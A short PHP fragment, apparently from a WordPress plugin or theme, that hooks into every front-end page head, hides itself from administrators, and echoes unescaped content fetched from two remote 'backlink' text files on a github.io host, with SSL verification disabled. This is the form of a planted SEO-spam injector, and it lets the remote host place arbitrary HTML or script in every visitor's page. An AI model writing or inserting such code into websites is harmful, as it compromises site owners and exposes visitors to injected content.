if (!defined('ABSPATH')) exit;
function g($u) {
$c = @file_get_contents($u, false, stream_context_create([
'http' => ['user_agent' => 'Mozilla/5.0'],
'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
]));
return $c ? $c : '';
}
add_action('wp_head', function() {
if (is_admin()) return;
echo g('https://superkencang.github.io/backlink/bl.txt');
echo g('https://superkencang.github.io/backlink/kueri.txt');
}, 1);